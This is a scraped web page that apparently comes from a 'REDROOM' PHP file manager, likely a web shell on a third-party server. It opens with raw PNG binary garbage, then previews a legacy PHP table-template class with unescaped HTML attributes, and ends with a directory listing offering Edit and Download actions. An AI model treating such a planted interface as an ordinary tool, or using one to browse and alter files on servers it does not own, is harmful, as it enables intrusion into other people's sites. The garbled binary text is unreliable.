PNG  IHDR* pHYs+ IDATx]n#; cdLb Ǚ[at¤_:uP}>!Usă cag޿ ֵNu`ݼTâabO7uL&y^wFٝA"l[|ŲHLN밪4*sG3|Dv}?+y߉{OuOAt4Jj.u]Gz*҉sP'VQKbA1u\`& Af;HWj hsO;ogTu uj7S3/QzUr&wS`M$X_L7r2;aE+ώ%vikDA:dR+%KzƉo>eOth$z%: :{WwaQ:wz%4foɹE[9<]#ERINƻv溂E%P1i01 |Jvҗ&{b?9g=^wζXn/lK::90KwrюO\!ջ3uzuGv^;騢wq<Iatv09:tt~hEG`v;3@MNZD.1]L:{ծI3`L(÷ba")Y.iljCɄae#I"1 `3*Bdz>j<fU40⨬%O$3cGt]j%Fߠ_twJ;ABU8vP3uEԑwQ V:h%))LfraqX-ۿX]v-\9I gl8tzX ]ecm)-cgʒ#Uw=Wlێn(0hPP/ӨtQ“&J35 $=]r1{tLuǮ*i0_;NƝ8;-vݏr8+U-kruȕYr0RnC]*ެ(M:]gE;{]tg(#ZJ9y>utRDRMdr9㪩̞zֹb<ģ&wzJM"iI( .ꮅX)Qw:9,i좜\Ԛi7&N0:asϓc];=ΗOӣ APqz93 y $)A*kVHZwBƺnWNaby>XMN*45~ղM6Nvm;A=jֲ.~1}(9`KJ/V F9[=`~[;sRuk]rєT!)iQO)Y$V ی ۤmzWz5IM Zb )ˆC`6 rRa}qNmUfDsWuˤV{ Pݝ'=Kֳbg,UҘVz2ﴻnjNgBb{? ߮tcsͻQuxVCIY۠:(V뺕 ٥2;t`@Fo{Z9`;]wMzU~%UA蛚dI vGq\r82iu +St`cR.6U/M9IENDB` REDROOM
PHP 5.6.40
Preview: Table_template.php Size: 1.70 KB
/home/ankaservis/azad.ankaservis.com/muhasebe/barkod/class/Table_template.php

<?php
class tpl_LS {
	function __header ( $width, $title ) {
		echo '<table width="'.$width.'" border="0" cellpadding="0" cellspacing="0" align="center" bgcolor="#004163" class="tableline"><tr><th><u>'.$title.'</u>'."\n".'</th></tr><tr><td>'."\n".'<table width="100%" border="0" cellpadding="4" cellspacing="1" align="center">';
	}

	function __footer ( $width, $title ) {
		echo '</table>'."\n".'</td></tr></table>'."\n";
	}

	function __row_start ( $attributes ) {
		$code = '';
		$found_class = false;
		reset( $attributes );
		while( list( $key, $value ) = each( $attributes ) ) {
			$code .= ' '.$key.'="'.$value.'"';
			if( $key == 'class' )
				$found_class = true;
		}
		if( $found_class=== false )
			$code .= ' class="'.next_color().'"';
		echo '<tr'.$code.'>';
	}

	function __row_stop ( $attributes ) {
		echo '</tr>';
	}

	function __cell_start ( $text, $attributes ) {
		$code = '';
		reset( $attributes );
		while( list( $key, $value ) = each( $attributes ) )
			$code .= ' '.$key.'="'.$value.'"';
		echo '<td'.$code.'>'.$text;
	}

	function __cell_stop ( $text, $attributes ) {
		echo '</td>';
	}
}

class tpl_BLANK {
	function __header ( $width, $title ) {
		echo '<table width="'.$width.'" border="0" cellpadding="0" cellspacing="0" align="center">';
	}

	function __footer ( $width, $title ) {
		echo '</table>';
	}

	function __row_start ( $attributes ) {
		echo '<tr>';
	}

	function __row_stop ( $attributes ) {
		echo '</tr>';
	}

	function __cell_start ( $text, $attributes ) {
		$code = '';
		reset( $attributes );
		while( list( $key, $value ) = each( $attributes ) )
			$code .= ' '.$key.'="'.$value.'"';
		echo '<td'.$code.'>'.$text;
	}

	function __cell_stop ( $text, $attributes ) {
		echo '</td>';
	}
}
?>

Directory Contents

Dirs: 0 × Files: 22

Name Size Perms Modified Actions
3.16 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
2.89 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.29 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.84 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
4.38 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
9.07 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
4.71 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
6.29 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
845 B lrw-r--r-- 2017-05-21 19:35:02
Edit Download
2.06 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.16 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
1.02 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
18.21 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.37 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
2.03 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.49 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.04 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
1.70 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
6.46 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
8.38 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
3.33 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download
4.50 KB lrw-r--r-- 2017-05-21 19:35:02
Edit Download

If ZipArchive is unavailable, a .tar will be created (no compression).
© 2026 REDROOM — Secure File Manager. All rights reserved. Built with ❤️ & Red Dark UI